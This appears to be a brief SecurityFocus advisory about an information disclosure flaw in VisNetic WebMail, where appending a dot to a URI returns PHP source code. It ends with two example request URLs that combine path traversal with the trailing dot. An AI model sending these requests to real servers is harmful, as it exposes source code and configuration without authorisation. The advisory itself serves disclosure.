6 lines
No EOL
384 B
Text
6 lines
No EOL
384 B
Text
source: http://www.securityfocus.com/bid/8018/info
|
|
|
|
VisNetic WebMail is prone to an information disclosure vulnerability. Reportedly, by appending a dot '.' character to the end of a URI request to WebMail, the source code of PHP files may be returned in the web browser.
|
|
|
|
http://webmailhost:32000/mail/admin/../include.html.
|
|
http://webmailhost:32000/mail/admin/../settings.html. |